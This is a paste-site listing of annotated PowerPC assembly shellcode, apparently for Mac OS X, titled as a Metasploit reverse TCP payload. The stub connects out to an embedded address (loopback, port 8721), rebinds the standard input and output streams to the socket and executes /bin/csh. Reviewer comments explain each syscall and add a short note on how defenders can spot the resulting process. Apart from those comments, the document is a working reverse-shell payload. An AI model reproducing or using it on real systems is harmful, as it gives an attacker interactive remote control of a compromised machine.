emS-St1ks

Reverse Tcp inject metasploit

Jun 15th, 2012
  ; Reverse-connect shell stub for 32-bit PowerPC.
  ; NOTE(review): the Mach-O style `_main`, the BSD syscall numbers and the
  ; leading sin_len byte in the sockaddr suggest Mac OS X / Darwin - confirm.
  ;
  ; Flow: socket(AF_INET, SOCK_STREAM, TCP) -> connect() to the endpoint embedded
  ; in the code -> dup2() the socket onto fds 2, 1, 0 -> fork() -> execve("/bin/csh").
  ; Embedded endpoint as listed: 127.0.0.1, port 0x2211 (8721 decimal).
  ; No syscall return value is inspected anywhere in the listing.
  ;
  ; Register roles: r0 = syscall number, r3-r5 = syscall arguments,
  ; r30 = socket descriptor (kept across calls), r1 = stack pointer.
  ;
  ; Defender view: the observable behaviour is a process that opens an outbound
  ; TCP connection, rebinds stdin/stdout/stderr to that socket and then execs
  ; /bin/csh. A csh process whose fds 0-2 all refer to one TCP socket is the
  ; artefact to look for in process and socket telemetry.
  1. .globl _main
  2. .text
  3. _main:
  4. ;; socket
  5. li r3, 2 ; domain = 2 (AF_INET)
  6. li r4, 1 ; type = 1 (SOCK_STREAM)
  7. li r5, 6 ; protocol = 6 (IPPROTO_TCP)
  8. li r0, 97 ; syscall 97 = socket
  9. sc
  10. xor r0, r0, r0 ; filler in the slot after sc. NOTE(review): on Darwin/PPC a successful syscall resumes one instruction past sc, so this is the error-return slot - confirm
  11. mr r30, r3 ; keep the socket descriptor in r30
  12.  
  13. bl _connect ; branch over the 8 data bytes below; LR now holds their address
  14. .long 0x00022211 ; sockaddr_in head: sin_len = 0x00, sin_family = 0x02 (AF_INET), sin_port = 0x2211 (8721)
  15. .long 0x7f000001 ; sin_addr = 127.0.0.1 (loopback)
  16.  
  17. _connect:
  18. mflr r4 ; r4 = address of the embedded sockaddr_in
  19. li r5, 0x10 ; addrlen = 16; only 8 bytes are data, so the remaining 8 read as the instruction bytes that follow
  20. li r0, 98 ; syscall 98 = connect
  21. mr r3, r30 ; r3 = socket descriptor
  22. sc
  23. xor. r5, r5, r5 ; slot after sc (see line 10); also zeroes r5 and sets CR0
  24.  
  25. _setup_dup2:
  26. li r5, 2 ; start with fd 2 (stderr) and count down
  27.  
  28. _dup2:
  29. li r0, 90 ; syscall 90 = dup2
  30. mr r3, r30 ; oldfd = socket
  31. mr r4, r5 ; newfd = current counter value
  32. sc
  33. xor r0, r0, r0 ; slot after sc (see line 10)
  34. subi r5, r5, 1
  35. cmpwi r5, -1
  36. bnel _dup2 ; repeat while r5 != -1, i.e. for fds 2, 1, 0; the 'l' form also updates LR
  37.  
  38. _fork:
  39. li r0, 2 ; syscall 2 = fork
  40. sc
  41. xor. r5, r5, r5 ; slot after sc (see line 10); fork result is not examined, execution falls into _execsh
  42.  
  43. _execsh:
  44. xor. r5, r5, r5 ; r5 = 0 (later used as NULL); record form sets CR0.EQ
  45. bnel _execsh ; never taken because EQ is set, but LK=1 still loads LR with the address of the next instruction
  46. mflr r3 ; r3 = address of this instruction
  47. addi r3, r3, 28 ; +28 = 7 instructions * 4 bytes, landing on `path`; the offset depends on the exact instruction count below
  48. stw r3, -8(r1) ; argv[0] = path (stored below the stack pointer, r1 is not adjusted)
  49. stw r5, -4(r1) ; argv[1] = NULL
  50. subi r4, r1, 8 ; r4 = {path, 0}
  51. li r0, 59 ; syscall 59 = execve
  52. sc ; execve(path, argv, NULL)
  53.  
  54. ; csh removes the need for setuid() (original author's claim; not verifiable from this listing)
  55. path:
  56. .ascii "/bin/csh" ; 8 bytes, no terminator of its own
  57. .long 0x00414243 ; big-endian: leading 0x00 terminates the path string, 0x41 0x42 0x43 ("ABC") is padding